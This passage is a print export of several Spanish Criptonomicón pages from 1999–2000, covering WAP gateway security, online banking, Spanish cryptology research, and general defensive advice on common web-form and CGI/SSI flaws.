destinatario, el asunto y tu nombre.
file:///C|/TEMP/criptonomicon/criptonomicon/susurros/susurros15.html (3 of 4) [25/10/2000 02:32:27 p.m.]

La seguridad de GSM se tambalea

E-mail destino:
Asunto:
Tu nombre:
Enviar

Borrar

Copyright 1997-2000 Gonzalo lvarez Maran, CSIC. Todos los derechos reservados.
Criptonomicn es un servicio ofrecido libremente desde el Instituto de Fsica Aplicada del CSIC. Para informacin sobre
privacidad, por favor consulte la declaracin de poltica sobre privacidad. Para sugerencias, comentarios o quejas, acuda al libro de
visitas. Para contribuir al Criptonomicn, lea la pgina de contribuciones.

file:///C|/TEMP/criptonomicon/criptonomicon/susurros/susurros15.html (4 of 4) [25/10/2000 02:32:27 p.m.]

Internet en la palma de su mano

Suscripcin gratis

Intimidad?

Artculos

Seguridad

Linux

Navegacin segura

Control de acceso

CGI

Java

JavaScript

Internet en la palma de su mano


La ltima feria de SIMO TCI en Madrid y poco antes Telecom 99 en Ginebra
han venido a poner de manifiesto el indiscutible liderazgo de la telefona
mvil e Internet en el futuro inmediato de las tecnologas de la informacin y
de las comunicaciones en todo el mundo. El acceso mvil a Internet, milagro
posible gracias a la nueva tecnologa WAP, se ha perfilado como uno de los
protagonistas indiscutibles, acaparando la atencin de los principales
fabricantes de productos de telefona celular y de las operadoras ms
importantes, que comienzan a acariciar la idea de un futuro donde pequeos
dispositivos mviles (telfonos, asistentes personales digitales (PDA),
organizadores y otros increbles aparatos presentados en las ferias)
desbanquen al PC, abriendo paso a un mundo donde las comunicaciones
graviten en torno a la Internet sin hilos.

Cookies

Crashes

Agujeros

Spam

Remailers

Anonimato

Correo seguro

Web seguro

Susurros desde la Cripta

El protocolo de aplicaciones inalmbricas (WAP) constituye el estndar de


facto mundial para la prestacin de servicios de informacin y telefona sin
hilos en terminales mviles digitales y otros dispositivos inalmbricos,
desarrollado por la unin de los lderes mundiales en el mercado de las
telecomunicaciones sin hilos, tanto fabricantes como operadoras y
proveedores de servicios. WAP permite transportar la riqueza de informacin
y servicios accesibles desde Internet hasta la pantalla de su telfono mvil,
en cualquier lugar, en cualquier momento, sin necesidad de cables, de lneas
telefnicas ni de ordenador.
Los terminales mviles con soporte para WAP incorporan adems un
micronavegador que sirve para acceder a la informacin deseada utilizando
el lenguaje WML, de manera similar a como funcionan los navegadores
convencionales en el ordenador leyendo pginas HTML. Por supuesto,
dadas las limitaciones actuales en la velocidad de transmisin de datos a
travs de lneas GSM (tpicamente 9600 bits/s para comunicaciones
orientadas a conexin y una tasa de transferencia efectiva de 100 bits/s para
SMS) y debido a las reducidas dimensiones de la pantalla de los mviles
(dimensiones habituales de 4x12 caracteres), todava no resulta posible una

file:///C|/TEMP/criptonomicon/criptonomicon/susurros/susurros14.html (1 of 4) [25/10/2000 02:32:27 p.m.]

Internet en la palma de su mano


Consejos prcticos

Referencias

Libro de Visitas

experiencia de navegacin con grficos, animaciones, efectos multimedia y


grandes volmenes de datos. Pero s es posible acceder a servicios de
informacin muy variados, como noticias, finanzas, banca a distancia, trfico,
informacin y reserva de viajes, el tiempo, ocio, correos electrnicos y faxes,
acceso a bases de datos en intranets corporativas, directorios de
informacin, etc.
Dado el carcter comprometido de las aplicaciones va WAP (reserva y
adquisicin de entradas y billetes, operaciones bancarias, compra-venta de
valores burstiles), la seguridad es un prerrequisito fundamental que exigirn
los usuarios y que los bancos y proveedores de contenidos se esforzarn
por ofrecer. WTLS (seguridad en la capa de transporte sin hilos) proporciona
los servicios bsicos de seguridad, como confidencialidad, integridad,
autenticacin y proteccin contra denegacin de servicio (DoS),
constituyendo el equivalente inalmbrico del estndar TLS (seguridad de la
capa de transporte), basado en el popular SSL v3.0, que sirve para
establecer un canal de comunicaciones seguro entre el navegador del
usuario y el servidor web y del que se ha hablado en repetidas ocasiones
desde el Criptonomicn. WTLS incorpora nuevas caractersticas como
soporte para datagramas, handshake optimizado frente a la fuerte
sobrecarga de TLS o SSL y refresco dinmico de claves (las claves son
invalidadas frecuentemente para frustrar el criptoanlisis). Adems, este
protocolo ha sido optimizado para redes portadoras con ancho de banda
escaso y largos perodos de latencia.
Desgraciadamente, los pequeos procesadores de estos dispositivos
mviles carecen de la potencia de clculo para realizar las operaciones
criptogrficas posibles en redes fijas con el PC como herramienta.
Comprense los 64 MB de RAM de un ordenador de sobremesa
convencional con los 32 a 64 KB de un telfono mvil de gran memoria! y
con capacidad de clculo igualmente reducida. Existen dos vas de salida: o
reducir el tamao de los procesadores manteniendo su potencia o explorar
nuevas tecnologas criptogrficas. En este sentido, la criptografa de curvas
elpticas (ECC) est apuntando nuevas y prometedoras soluciones para los
pequeos dispositivos, ya que requieren un quinto de la memoria de los
criptosistemas convencionales, a la vez que conservan su seguridad (al
menos, dado el estado actual de nuestro conocimiento de las curvas
elpticas). La empresa Certicom se ha erigido en pionera en ofrecer
productos basados en ECC, incluidas soluciones para WAP. Por su parte,
Entrust est extendiendo su gama de productos PKI tambin a WAP.
Sin embargo, la desventaja de las soluciones basadas en ECC es la difcil
compatibilidad con otros productos basados en otros criptosistemas que
utilicen algoritmos como IDEA, DES, RSA, etc., problema que deber ser
resuelto.
Para que el mvil acceda a servidores de Internet, es necesaria la presencia

file:///C|/TEMP/criptonomicon/criptonomicon/susurros/susurros14.html (2 of 4) [25/10/2000 02:32:27 p.m.]

Internet en la palma de su mano

de una pasarela WAP, perteneciente a la operadora de telecomunicaciones,


que traduzca las peticiones en WAP originadas por el mvil a peticiones en
HTTP que entienda el servidor web. Recprocamente, las respuestas de los
servidores web en HTTP (las pginas en HTML) deben a su vez traducirse al
lenguaje WML para que se representen adecuadamente en el terminal mvil.
La transmisin de datos entre el mvil y la pasarela se realiza utilizando los
servicios de la capa WTLS, mientras que las comunicaciones entre la
pasarela y los servidores web se aseguran mediante SSL o TLS. La
transmisin segura extremo a extremo es gestionada de forma transparente
y automtica por la pasarela WAP. Ahora bien, este esquema ofrece un taln
de Aquiles en la propia pasarela, ya que requiere descifrar la informacin de
WTLS a SSL y viceversa. Durante ese breve instante en que los datos se
encuentran en claro en la memoria de la pasarela de la operadora se podra
producir el ataque. La posibilidad es remota, pero real. Empleados desleales
de la compaa o un hbil hacker que comprometiera la seguridad de la
pasarela podran hacerse con las comunicaciones que pasan a travs de
ella.
Los problemas de exportacin de la criptografa no harn sino agravar la
situacin, ya que en algunos lugares estar prohibido utilizar algoritmos con
plena potencia. No ser inusual encontrarse con que la legislacin vigente
permita la autenticacin fuerte, mientras que prohibe el cifrado fuerte.
Como vemos, la carrera hacia la Internet mvil no ha hecho sino empezar.
Durante el primer trimestre del ao que viene se producir el boom del
acceso mvil a Internet y tendr lugar la proliferacin de nuevos portales de
acceso, con contenidos y servicios innovadores, a la medida de los clientes
con necesidades de comunicaciones y conectividad ms exigentes.
Actualmente, el nmero de telfonos celulares vendidos supera con creces
al de ordenadores, y segn todas las previsiones, en el 2002 habr en
Espaa ms terminales mviles que lneas telefnicas fijas. El PC como
medio tradicional de acceso a Internet ver mermar su protagonismo ante el
avance imparable de los dispositivos mviles, que comienzan a convertirse
en autnticas oficinas en miniatura, como centrales de acceso a la
informacin, envo y recepcin de faxes y correos electrnicos y, por
supuesto, comunicaciones de voz. La Internet del siglo que viene podr
caber en la palma de su mano. La seguridad se ver tambin igualmente
menguada o ser comparable a la de las comunicaciones fijas?
Publicado en el Boletn del Criptonomicn #61.

Informacin adicional

WAP Forum

PortalWAP

Phone.com

Nokia

file:///C|/TEMP/criptonomicon/criptonomicon/susurros/susurros14.html (3 of 4) [25/10/2000 02:32:27 p.m.]

Internet en la palma de su mano

Introduccin a la Criptografa de Curvas Elpticas

Otros artculos publicados


Se pueden leer otros artculos desde la pgina principal de Susurros desde la Cripta.
Enviar a un amigo
Si consideras que este artculo puede interesarle a alguien que conozcas, puedes
envirselo por correo electrnico. No tienes ms que indicar la direccin del
destinatario, el asunto y tu nombre.
E-mail destino:
Asunto:
Tu nombre:
Enviar

Borrar

Copyright 1997-1999 Gonzalo lvarez Maran, CSIC. Todos los derechos reservados.
Criptonomicn es un servicio ofrecido libremente desde el Instituto de Fsica Aplicada del CSIC. Para informacin sobre
privacidad, por favor consulte la declaracin de poltica sobre privacidad. Para sugerencias, comentarios o quejas, acuda al libro de
visitas. Para contribuir al Criptonomicn, lea la pgina de contribuciones.

file:///C|/TEMP/criptonomicon/criptonomicon/susurros/susurros14.html (4 of 4) [25/10/2000 02:32:27 p.m.]

La nueva banca digital del siglo que viene

Suscripcin gratis

Intimidad?

Artculos

Seguridad

Linux

Navegacin segura

Control de acceso

CGI

Java

JavaScript

Cookies

Crashes

Agujeros

Spam

Remailers

Anonimato

Correo seguro

Web seguro

Susurros desde la Cripta

La nueva banca digital del siglo que viene


El ritmo imparable de avance de las telecomunicaciones y de las tecnologas
de la informacin, especialmente tras la liberalizacin en Espaa de este
mercado, ha motivado que la prctica totalidad de los Bancos y Cajas de
Ahorros espaoles hayan dado el salto a la Red en busca de nuevos canales
de distribucin para llegar hasta sus clientes con nuevos servicios bancarios
mejorados y personalizados. La apuesta de las distintas entidades bancarias
ha sido variopinta, ofrecindose a los usuarios un amplio espectro de
posibilidades en cuanto a la oferta de productos y servicios financieros que
pueden esperarse en el panorama bancario espaol. Las posibilidades que
brindan las innovaciones tecnolgicas en telecomunicaciones y gestin de la
informacin son ilimitadas: desde la consulta de saldos y movimientos de la
cuenta corriente personal mediante televisin interactiva, pasando por la
realizacin de transferencias y otras operaciones a travs de un telfono
mvil con la ltima tecnologa WAP o la compra-venta de valores y acciones
con la colaboracin de agentes financieros software a travs de Internet a
precios muy ventajosos. El lmite tan slo viene impuesto por la imaginacin
de los proveedores de contenidos y servicios.
Internet, lneas telefnicas, telefona celular GSM y WAP, la futura UMTS,
que har realidad en el 2002 las aplicaciones multimedia en los telfonos
mviles, toda una pltora de tecnologas despliegan un inmenso abanico de
posibilidades para crear nuevas estrategias multicanal que optimicen la
relacin de las grandes entidades con sus clientes, buscando ofrecer nuevos
productos y servicios mejorados y personalizados, tericamente ms
baratos.
Ahora bien, contrariamente al efecto deseado, los consumidores corren el
riesgo de que, como resultado del nuevo ciclo de fusiones, adquisiciones y
alianzas que estn teniendo lugar recientemente en Espaa, se incremente
el coste de los servicios a travs de la reduccin de ofertantes en el mercado
financiero y el encarecimiento de la intermediacin bancaria. Como
consecuencia, los pequeos clientes perdern importancia ante los nuevos

file:///C|/TEMP/criptonomicon/criptonomicon/susurros/susurros13.html (1 of 4) [25/10/2000 02:32:28 p.m.]

La nueva banca digital del siglo que viene


Consejos prcticos

Referencias

Libro de Visitas

megabancos producto de las concentraciones bancarias que buscan


afianzar el liderazgo a travs de un mayor tamao. Estos clientes carecen
con frecuencia de los conocimientos econmicos necesarios ante productos
cada da ms sofisticados, por lo que se vuelve acuciante la necesidad de
ofrecerles informacin clara y comprensible sobre los servicios financieros
ofertados y establecer perodos de reflexin que les permitan analizar las
condiciones y compararlas con ofertas de otros bancos. Un uso malvolo de
la banca digital puede ser el empujar a los usuarios a travs de pantallas
sucesivas hacia la contratacin de servicios y productos en condiciones
desfavorables, aceptadas irreflexivamente por el usuario, bien por
ignorancia, bien llevados por la inercia generada por el hbil diseo de las
pginas.
Otra asignatura pendiente en el mercado europeo es la creacin y
legitimizacin del dinero electrnico, que permita dinamizar el sector del
pequeo consumo dentro del captulo del comercio electrnico. En la
actualidad, todava ningn banco espaol ofrece dinero electrnico
propiamente dicho, hbil para compras al por menor en Internet, basadas en
micropagos, que permiten pagar bienes y servicios por importes tan
pequeos como se quiera, incluso de una sola peseta o fracciones de
peseta. Los modelos de pago actuales mediante tarjeta de crdito, apoyados
en SSL o SET, resultan inadecuados para compras de escaso valor, por lo
que se estn buscando soluciones alternativas. Los Bancos y Cajas debern
desarrollar nuevas normas que garanticen el funcionamiento y seguridad de
este medio de pago y establecer los requisitos que la emisin de dinero
electrnico deber cumplir. Un requisito fundamental de todo medio de pago
debe ser la interoperabilidad, especialmente en un mbito como Internet que
no conoce fronteras geogrficas. Mientras no se trabaje ms intensamente
en esta lnea, el sector del pequeo consumo seguir siendo una quimera en
Internet.
Por otro lado, todava los mecanismos de seguridad implantados en la
mayora de Bancos y Cajas no son completamente satisfactorios para una
actividad como la bancaria, en la que el usuario no slo consulta saldos y
movimientos de sus cuentas y tarjetas, sino que tambin puede efectuar
transferencias y traspasos, as como comprar y vender acciones. Tras la
reciente aprobacin del Congreso de los Diputados el pasado 21 de octubre
de 1999 del Real Decreto Ley sobre la Firma Digital, no se puede admitir que
los bancos se demoren mucho ms en la implantacin de certificados
digitales como solucin para la identificacin bilateral de las partes
implicadas en las transacciones a travs de Internet. Queda por ver hacia
qu tipo de soluciones tecnolgicas se caminar en otros medios de acceso
que irn volvindose paulatinamente ms populares como la TV interactiva
digital o el telfono mvil con acceso a Internet a travs del navegador WAP.
Adems, es de esperar una lnea de actitud de los Bancos y Cajas ms
comprometida con el fomento y desarrollo del comercio electrnico en

file:///C|/TEMP/criptonomicon/criptonomicon/susurros/susurros13.html (2 of 4) [25/10/2000 02:32:28 p.m.]

La nueva banca digital del siglo que viene

Espaa, que an est muy verde. En el futuro prximo debern ofrecer ms


soluciones para las pequeas y medianas empresas, proporcionando
soporte de TPV (Terminales de Punto de Venta), asesoramiento y
facilidades para montar negocios en Internet y un descenso en las
comisiones y mayor proteccin para los comerciantes en lnea; involucrarse
ms profundamente en el despliegue de SET, firmando acuerdos con
organismos de certificacin electrnica, de manera que comiencen a emitir a
gran escala certificados digitales para sus clientes; formar mejor a su
personal en las nuevas tecnologas e inaugurar servicios tcnicos de ayuda
para usuarios de banca digital y comercio electrnico, cualificados para
solucionar las consultas en este nuevo mbito; buscar nuevos modelos de
negocio aprovechando el potencial siempre en aumento de la tecnologa,
como el acceso mvil sin hilos o los agentes software. Aunque muchos
Bancos y Cajas de Ahorro estn llevando a cabo tmidos experimentos en
este campo (Banesto, Bankinter, la Caixa), la sensacin externa que se
percibe es de poco convencimiento.
Se ha progresado significativamente en materia de disponibilidad de
servicios y productos, comodidad y flexibilidad de uso, acceso a informacin
en tiempo presente de valores burstiles y noticias econmicas,
democratizacin de mercados, reduccin de precios y comisiones,
asesoramiento y otras facetas de la actividad bancaria y financiera. Sin
embargo, estos avances entraan sus riesgos para los clientes y distan
mucho de configurar un mercado ideal, que en el futuro tiende a estar
dominado por un puado de grandes bancos. Como siempre, el usuario de a
pie, pagar la cuenta.
Publicado en el Boletn del Criptonomicn #59.

Informacin adicional

Nuevas tendencias de la banca en Internet

Banca en Internet: hacia servicios globales desde casa

Especial Banca Electrnica

WAP Forum

Otros artculos publicados


Se pueden leer otros artculos desde la pgina principal de Susurros desde la Cripta.
Enviar a un amigo
Si consideras que este artculo puede interesarle a alguien que conozcas, puedes
envirselo por correo electrnico. No tienes ms que indicar la direccin del
destinatario, el asunto y tu nombre.
E-mail destino:
Asunto:

file:///C|/TEMP/criptonomicon/criptonomicon/susurros/susurros13.html (3 of 4) [25/10/2000 02:32:28 p.m.]

La nueva banca digital del siglo que viene

Tu nombre:
Enviar

Borrar

Copyright 1997-1999 Gonzalo lvarez Maran, CSIC. Todos los derechos reservados.
Criptonomicn es un servicio ofrecido libremente desde el Instituto de Fsica Aplicada del CSIC. Para informacin sobre
privacidad, por favor consulte la declaracin de poltica sobre privacidad. Para sugerencias, comentarios o quejas, acuda al libro de
visitas. Para contribuir al Criptonomicn, lea la pgina de contribuciones.

file:///C|/TEMP/criptonomicon/criptonomicon/susurros/susurros13.html (4 of 4) [25/10/2000 02:32:28 p.m.]

Podemos hablar de criptologa espaola?

Suscripcin gratis

Intimidad?

Artculos

Seguridad

Linux

Navegacin segura

Control de acceso

CGI

Java

JavaScript

Cookies

Crashes

Agujeros

Spam

Remailers

Anonimato

Correo seguro

Web seguro

Susurros desde la Cripta

Podemos hablar de criptologa espaola?


A menudo me repiten la misma pregunta: "por qu en Espaa no se hace
nada de criptologa?" A mi juicio, esta pregunta encierra dos trampas,
transmite dos mensajes subliminales que adivino slidamente injertados en
la mente de mis interlocutores.
La primera consiste en considerar que Espaa es y continuar siendo una
nacin atrasada, el Tercer Mundo de la Europa del Sur, un pas de risa
donde impera la cultura del pelotazo y toda la ciencia se importa de Estados
Unidos y, en su defecto, de Francia, Reino Unido, Alemania u otros pases
"serios". Bien es verdad que los presupuestos de investigacin espaoles
quedan muy por detrs de los de nuestros vecinos, pero en criptologa, como
en el resto de ciencias y disciplinas cientficas, s se investiga, como se ver
a continuacin. Tras casi cuatro dcadas de autarqua y aislamiento
econmico y cientfico, recuperar el terreno perdido se ha convertido en una
tarea gargantuesca, en la que nada ayuda el hecho de que los mejores
cerebros nacionales se "fuguen" a EEUU. Pngase Ud. en el lugar de un
joven investigador, de genial talento y prometedor futuro. Dnde buscara
desarrollar su carrera cientfica? En un pas que le ofrece recursos con
cuentagotas o en otro donde dispondr de la ltima tecnologa y recursos
ilimitados? As estn las cosas, en Espaa se trabaja, pero sin los medios de
otros centros extranjeros. En estas condiciones no es de extraar que
nuestra ciencia no destaque en el panorama internacional.
La segunda trampa atae a la sensacin tan extendida de que "no se hace
nada". Es esto cierto?. Existen una serie de parmetros objetivos que
permiten cuantificar y de alguna manera cualificar el volumen de
investigacin en este campo. Las revistas y congresos ms importantes del
gremio, como son Crypto, EuroCrypto, Journal of Cryptology, Cryptologia,
etc., se consideran suficientemente imparciales y de gran rigor a la hora de
seleccionar los artculos que publican en sus pginas, como para que
podamos considerarlos rbitros fiables en este dilema. Basta con acudir a
sus ndices de autores y comprobaremos con desilusin la ausencia casi

file:///C|/TEMP/criptonomicon/criptonomicon/susurros/susurros12.html (1 of 3) [25/10/2000 02:32:28 p.m.]

Podemos hablar de criptologa espaola?


Consejos prcticos

Referencias

Libro de Visitas

total de grupos espaoles.


Otra manera de evaluar los xitos de nuestros criptlogos es revisar los
algoritmos criptogrficos ms usados (lo que implcitamente debera
significar ms seguros) en busca de creaciones espaolas. Aqu tambin
nuestra desilusin persiste, pues no conozco ni un solo algoritmo abierto de
uso internacional de origen espaol.
De todas formas, estos criterios de juicio pueden resultar excesivamente
duros y llevarnos a pensar que, efectivamente, la criptologa espaola no
existe o es una broma. Afortunadamente, desde hace ya unos aos, estn
proliferando en todas las universidades espaolas y laboratorios de
investigacin grupos dedicados a la creacin de nuevos algoritmos,
criptoanlisis de otros pblicos ya existentes, diseo de protocolos,
integracin de servicios de seguridad basados en infraestructura de clave
pblica (PKI) y un sinfn de actividades relacionadas directa o indirectamente
con la criptologa.
Como exponentes de esta labor, se pueden resear las investigaciones y
trabajos llevados a cabo por:
El grupo CriptoLab, de la Facultad de Informtica, bajo la direccin de
Jorge Dvila Muro.
La Universidad de Zaragoza, con Jos Pastor Franco a la cabeza .

El Departamento de Matemtica Aplicada y Telemtica de la


Universidad Politcnica de Catalua, dirigido por Carles Padr.
Universidad de Valladolid, con Juan Tena Ayuso.

Universidad Rovira i Virgili, con Josep Domingo Ferrer.

El Departamento de Tratamiento de la Informacin y Codificacin del


Consejo Superior de Investigaciones Cientficas, con Fausto Montoya
Vitini como director.
La Asociacin Espaola de Criptologa.

La Universidad de La Laguna, con la presencia de Pino Caballero Gil.

La compaa Servicios para Medios de Pago (SERMEPA), implicada


en el desarrollo de medios de pago mediante tarjetas y a travs de
redes de comunicaciones.
La Fbrica Nacional de Moneda y Timbre (FNMT), cuyo Proyecto
Ceres est recabando gran atencin del pblico, especialmente con
motivo de su experiencia pionera en la Declaracin de Renta '98.
Los militares y el CESID constituyen un captulo aparte, ya que su
trabajo es secreto y poco se conoce acerca de l. Sin duda, son los
pioneros en Espaa (y en todo el mundo, ya que en general, puede
decirse que la criptologa naci como una herramienta militar ms para
su uso en conflictos blicos).

file:///C|/TEMP/criptonomicon/criptonomicon/susurros/susurros12.html (2 of 3) [25/10/2000 02:32:28 p.m.]

Podemos hablar de criptologa espaola?

Y por supuesto, quedan en el tintero otros centros y departamentos, que por


razones de espacio no cito, pero que tambin desarrollan su labor. El
prximo congreso sobre Criptologa y Seguridad en la Informacin, que
tendr lugar en Canarias en el ao 2000, constituir un punto de encuentro
donde los profesionales de este campo podrn dar a conocer su trabajo y
seguir lo que se est haciendo en nuestro pas.
Si bien es cierto que el estado de la criptologa espaola no se encuentra en
un nivel comparable al de las grandes potencias criptolgicas como EEUU o
Israel, quedmonos cuando menos con la idea esperanzadora de que en
Espaa se hace mucha criptologa, y tambin buena criptologa. Qu nos
falta entonces? Lo que en otros pases abunda y en Espaa escasea en
todos los mbitos: el apoyo de la empresa y de otras instituciones que
aporten capital econmico y humano.
Publicado en el Boletn del Criptonomicn #58.

Informacin adicional

Especial seguridad del Ciberp@s

Otros artculos publicados


Se pueden leer otros artculos desde la pgina principal de Susurros desde la Cripta.
Enviar a un amigo
Si consideras que este artculo puede interesarle a alguien que conozcas, puedes
envirselo por correo electrnico. No tienes ms que indicar la direccin del
destinatario, el asunto y tu nombre.
E-mail destino:
Asunto:
Tu nombre:
Enviar

Borrar

Copyright 1997-1999 Gonzalo lvarez Maran, CSIC. Todos los derechos reservados.
Criptonomicn es un servicio ofrecido libremente desde el Instituto de Fsica Aplicada del CSIC. Para informacin sobre
privacidad, por favor consulte la declaracin de poltica sobre privacidad. Para sugerencias, comentarios o quejas, acuda al libro de
visitas. Para contribuir al Criptonomicn, lea la pgina de contribuciones.

file:///C|/TEMP/criptonomicon/criptonomicon/susurros/susurros12.html (3 of 3) [25/10/2000 02:32:28 p.m.]

Sobre puertas y ratoneras

Suscripcin gratis

Intimidad?

Artculos

Seguridad

Linux

Navegacin segura

Control de acceso

CGI

Java

JavaScript

Cookies

Crashes

Agujeros

Spam

Remailers

Anonimato

Correo seguro

Web seguro

Susurros desde la Cripta

Sobre puertas y ratoneras


Ya es un viejo tpico afirmar que el comercio electrnico no termina de
despegar. Razones? Variadas y de distinto peso, pero siempre se esgrime
aquella de la seguridad y el temor al fraude. Conscientes de ello, los
administradores web y diseadores de aplicaciones dedican sus esfuerzos y
sus noches desveladas a fortificar los servidores, crear sistemas de
comercio a prueba de balas y rodear en definitiva a los portales de venta de
una slida atmsfera de confianza, que induzca al cliente potencial a realizar
sus compras y gastar su dinero.
Por supuesto, el problema de fondo no es slo el prestar una imagen de
seguridad, ya que tambin est en juego la informacin privada de los
usuarios y de la propia compaa. Se trata de asegurar todas las posibles
vas de ataque para prevenir la filtracin de informacin, evitar ataques de
denegacin de servicio o la modificacin de ficheros en servidores de la
compaa, incluyendo su pgina principal que constituye su escaparate de
cara al mundo y cuya alteracin atentara seriamente contra su imagen tan
arduamente buscada.
Con el fin de lograr estos objetivos de seguridad se contratan expertos en
redes, se instalan cortafuegos que slo permiten el trfico HTTP, se crean
polticas de seguridad para toda la empresa, a menudo se contrata una
auditora externa, para finalmente sentirse satisfecho con la seguridad global
de la aplicacin de comercio electrnico desarrollada. No hay servicios de
comunicaciones intiles a la escucha, se han utilizado las ltimas versiones
de los programas de bases de datos con todos los parches de ltima hora
correctamente aplicados, todos los permisos estn cuidadosamente
controlados, las listas de control de acceso estn protegidas, los logs
registran cada movimiento sospechoso, los antivirus estn actualizados al
minuto, en definitiva, todas las puertas traseras y ratoneras estn cerradas.
Pero, y la puerta principal? No se habr quedado abierta una rendija?
Aunque parezca mentira, muchos ataques se producen por la puerta grande,

file:///C|/TEMP/criptonomicon/criptonomicon/susurros/susurros09.html (1 of 4) [25/10/2000 02:32:29 p.m.]

Sobre puertas y ratoneras


Consejos prcticos

Referencias

Libro de Visitas

explotando errores tan obvios que ni los expertos de seguridad pensaban


que existieran o no miraron all. Se trata de olvidos o descuidos en la
programacin en HTML, JavaScript, CGI o ASP.
Muchos autores de programas CGI no son conscientes de que el programa
que escriben se ejecutar en un servidor web, al que acceder cualquier
persona, introduciendo cualquier entrada, incluso las insospechadas, para
las que el programa no est preparado. El no tener la seguridad en mente a
la hora de escribir un programa CGI puede tener consecuencias
desastrosas, pero cuntos programadores estn preparados para el reto?
Un descuido puede permitir a un atacante desde husmear el contenido de
archivos del servidor, hasta ganar acceso de root al sistema. Dentro del
captulo de CGI, se puede incluir a los server side includes (SSI), que
permiten toda clase de trucos para llegar a ejecutar comandos arbitrarios o
listar el contenido de ficheros seleccionados. Se puede encontrar
informacin completa sobre este tipo de ataques en Seguridad en CGI, tema
que ya ha sido tratado en profundidad.
Por otro lado, los formularios en pginas web, tal vez debido a su sencillez
de programacin en HTML, resultan muy descuidados. Es comn que no se
comprueben las longitudes de las entradas de los usuarios, que a veces,
deliberadamente o no, sern inusualmente largas, provocando un fallo del
programa que debe procesarlas. En el caso peor, se podra producir una
cada del servicio, mientras que en otros casos se puede revelar
indeseadamente el nombre de algn programa o fichero de datos,
informacin sobre la estructura de directorio del servidor, software utilizado,
y otros datos parecidos, valiosos en manos de un atacante.
Otros errores comunes consisten en la utilizacin de campos ocultos en
formularios para asignar el valor a ciertas variables, como por ejemplo el
precio de un producto. La manipulacin del formulario y de dicha etiqueta
resulta trivial usando cualquier editor de texto, permitiendo que cualquier
atacante pueda modificar a voluntad el valor de estos campos. Se puede
encontrar un ejemplo tal en la tienda de ejemplo de la seccin de cookies. Si
no existe una programacin en el servidor que contraste los datos enviados
desde el formulario, la tienda virtual puede experimentar grandes prdidas.
Los URL tambin pueden explotarse para obtener informacin acerca de
otros usuarios. A menudo, los programadores creen que una pgina slo
ser accedida desde otra pgina anterior o un formulario. Pero un atacante
podra crear un URL, escribindolo directamente en la ventana de direccin,
e intentar acceder a algn recurso protegido, como los datos de clientes o
bases de datos confidenciales, saltndose los filtros del programador, que se
encontraban en la pgina anterior.
Nuevos ataques estn proviniendo de la utilizacin de etiquetas en
JavaScript, que se incluyen en ventanas que se presentan al cliente en un
formulario para que introduzca un texto, como su opinin acerca de un

file:///C|/TEMP/criptonomicon/criptonomicon/susurros/susurros09.html (2 of 4) [25/10/2000 02:32:29 p.m.]

Sobre puertas y ratoneras

producto o la descripcin de las caractersticas de un cierto artculo. El


usuario medio introducir texto sencillo, mientras que el avezado intentar
introducir incluso programas en JavaScript, que a veces pueden llegar a
ejecutarse en la pgina web del comercio cuando la visite el siguiente
cliente. Un truco comn en este caso es la peticin al siguiente usuario de su
login y password, que confiado los introduce sin reservas, pasando as a ser
conocidos por el atacante.
En resumen, existe toda una serie de ataques ingeniosos basados
exclusivamente en la web, que no hacen uso de sofisticadas herramientas
de hacking, ni requieren grandes recursos computacionales, ni explotan
caractersticas de protocolos de difcil conocimiento. Utilizan la puerta
grande. Se llevan a cabo rellenando formularios y escribiendo los URL de
manera ingeniosa. La nica herramienta que precisan es un navegador. Por
lo tanto, pasan a travs de todos los controles estndar de filtrado de
paquetes y de control de contenido, al ser ataques disfrazados tras el trfico
web convencional.
Cuando se disea una aplicacin web sofisticada tambin deben tenerse en
cuenta estos agujeros, aunque se hayan cerrado todas las otras pequeas
puertas traseras. Recuerde, de nada le sirve tapar las ratoneras si se deja
abierta la puerta principal.
Publicado en el Boletn del Criptonomicn #55.

Informacin adicional

Seguridad en CGI

Perfecto

Otros artculos publicados


Se pueden leer otros artculos desde la pgina principal de Susurros desde la Cripta.
Enviar a un amigo
Si consideras que este artculo puede interesarle a alguien que conozcas, puedes
envirselo por correo electrnico. No tienes ms que indicar la direccin del
destinatario, el asunto y tu nombre.
E-mail destino:
Asunto:
Tu nombre:
Enviar

Borrar

file:///C|/TEMP/criptonomicon/criptonomicon/susurros/susurros09.html (3 of 4) [25/10/2000 02:32:29 p.m.]

Sobre puertas y ratoneras


Copyright 1997-1999 Gonzalo lvarez Maran, CSIC. Todos los derechos reservados.
Criptonomicn es un servicio ofrecido libremente desde el Instituto de Fsica Aplicada del CSIC. Para informacin sobre
privacidad, por favor consulte la declaracin de poltica sobre privacidad. Para sugerencias, comentarios o quejas, acuda al libro de
visitas. Para contribuir al Criptonomicn, lea la pgina de contribuciones.

file:///C|/TEMP/criptonomicon/criptonomicon/susurros/susurros09.html (4 of 4) [25/10/2000 02:32:29 p.m.]

Server Side Includes

Qu es CGI

Riesgos de CGI

CGIs seguros

SSI

Consejos

Recursos

Qu son
Las directivas de Server-Side Includes (SSI) constituyen
Qu son
poderosas herramientas para aumentar la productividad del
programador, ya que permiten al servidor modificar
Peligros
automticamente el documento solicitado antes de ser enviado al
Soluciones
navegador del cliente. Su propsito principal es insertar dentro de
las pginas Web el contenido de ficheros de texto, informacin
dinmica sobre ficheros (como por ejemplo su tamao) o la salida resultante de la
ejecucin de ciertos comandos del sistema ya preseleccionados o libres. Los
Server-Side Includes pueden contener a su vez otros Server-Side Includes, de forma
que se puede llegar a introducir una cantidad enorme de texto en una pgina con la
inclusin de un nico comando.
Los Server-Side Includes insertan el texto en el fichero exactamente en el mismo
sitio donde aparecen. En otras palabras, se reemplazan a s mismos en el instante en
que se sirven las pginas que los contienen.

Copyright 1997-1998 Gonzalo lvarez Maran, CSIC. Todos los derechos reservados.
Criptonomicn es un servicio ofrecido libremente desde el Instituto de Fsica Aplicada del CSIC. Para informacin sobre
privacidad, por favor consulte la declaracin de poltica sobre privacidad. Para sugerencias, comentarios o quejas, acuda al libro de
visitas. Para contribuir al Criptonomicn, lea la pgina de contribuciones.

file:///C|/TEMP/criptonomicon/criptonomicon/cgi/ssi.html [25/10/2000 02:32:29 p.m.]

Qu es CGI

Qu es CGI

Riesgos de CGI

CGIs seguros

SSI

Consejos

Recursos

Descripcin
La interfaz de pasarela comn (Common Gateway Interface, CGI)
Descripcin
es un protocolo genrico que permite extender las capacidades de
HTTP. Los programas en CGI aaden funcionalidad al servidor
Mecanismo de CGI
Web, funcionalidad que podra abrir agujeros de seguridad en el
servidor, ya que una aplicacin en CGI mal diseada podra permitir acceso total o
parcial al servidor.
A lo largo de estas pginas hablaremos en general de aplicaciones y programas en
